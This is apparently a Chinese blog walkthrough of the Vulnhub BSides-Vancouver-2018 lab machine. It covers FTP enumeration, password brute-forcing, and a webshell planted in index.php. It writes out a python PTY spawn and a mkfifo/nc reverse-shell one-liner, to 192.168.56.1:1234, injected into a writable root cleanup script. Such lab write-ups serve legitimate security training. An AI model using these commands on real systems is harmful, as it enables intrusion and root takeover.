Vulnhub靶机第十二关

Vulnhub靶机 BSides-Vancouver-2018-Workshop
靶机说明
靶机用ValualBox创建,目标是在其上获得root级访问。
目标
Boot to root:获得root权限和Flag。
运行环境
靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥
接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。
攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、
Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全
面的渗透工具。
老规矩nmap 扫描ip和获取详细信息
在这里插入图片描述
发现21端口开着
访问一下
ftp:192.168.56.102
发现五个账户
在这里插入图片描述
爆破密码成功
在这里插入图片描述
接着爆破后台密码
登录成功
在这里插入图片描述
开启nc监听
在index.php页面写入大马
访问index.php
成功获取shell
反弹交互式shell: python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述
尝试ssh连接
在这里插入图片描述
切换到root用户
在这里插入图片描述
查看flag
在这里插入图片描述
将获得的shell 提升至root 权限
访问/usr/local/bin/cleanup
发现权限很高,可以执行读写
在这里插入图片描述
发现一段清理Apache日志的脚本
在这里插入图片描述
利用他反弹shell获取root权限,修改其内容为
写入echo ‘#!/bin/sh’ >cleanup
写入echo ‘rm /tmp/d;mkfifo /tmp/d;cat /tmp/d|/bin/sh -i 2>&1|nc 192.168.56.1 1234 > /tmp/d’ >>cleanup
开启nc
再次访问 cat cleanup
成功获得root权限
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值